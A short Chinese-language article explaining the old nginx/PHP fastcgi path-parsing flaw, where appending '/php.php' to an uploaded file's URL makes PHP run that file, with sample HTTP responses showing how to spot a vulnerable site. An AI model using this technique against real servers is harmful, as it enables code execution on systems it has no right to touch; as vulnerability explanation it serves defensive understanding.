nginx解析漏洞利用

nginx解析漏洞利用

那麼假設存在一個http://www.target.com/jpg.jpg，我們以如下的方式去訪問

http://www.target.com/jpg.jpg/php.php

將會得到一個URI

/jpg.jpg/php.php

經過location指令，該請求將會交給後端的fastcgi處理，nginx爲其設置環境變量SCRIPT_FILENAME，內容爲

/scripts/jpg.jpg/php.php

而在其他的webserver如lighttpd當中，我們發現其中的SCRIPT_FILENAME被正確的設置爲

/scripts/jpg.jpg

所以不存在此問題。

後端的fastcgi在接受到該選項時，會根據fix_pathinfo配置決定是否對SCRIPT_FILENAME進行額外的處理，一般情況下如果不對fix_pathinfo進行設置將影響使用PATH_INFO進行路由選擇的應用，所以該選項一般配置開啓。Php通過該選項之後將查找其中真正的腳本文件名字，查找的方式也是查看文件是否存在，這個時候將分離出SCRIPT_FILENAME和PATH_INFO分別爲

/scripts/jpg.jpg和php.php

最後，以/scripts/jpg.jpg作爲此次請求需要執行的腳本，攻擊者就可以實現讓nginx以php來解析任何類型的文件了。

漏洞利用：訪問一個nginx來支持php的站點，在一個任何資源的文件如robots.txt後面加上/php.php，這個時候你可以看到如下的區別：

訪問http://www.target.com/robots.txt

 

HTTP/1.1 200 OK

Server: nginx/0.6.32

Date: Thu, 20 May 2010 10:05:30 GMT

Content-Type: text/plain

Content-Length: 18

Last-Modified: Thu, 20 May 2010 06:26:34 GMT

Connection: keep-alive

Keep-Alive: timeout=20

Accept-Ranges: bytes

 

訪問http://www.target.com/robots.txt/php.php

 

HTTP/1.1 200 OK

Server: nginx/0.6.32

Date: Thu, 20 May 2010 10:06:49 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Keep-Alive: timeout=20

X-Powered-By: PHP/5.2.6

 

其中的Content-Type的變化說明了後端負責解析的變化，該站點就可能存在漏洞。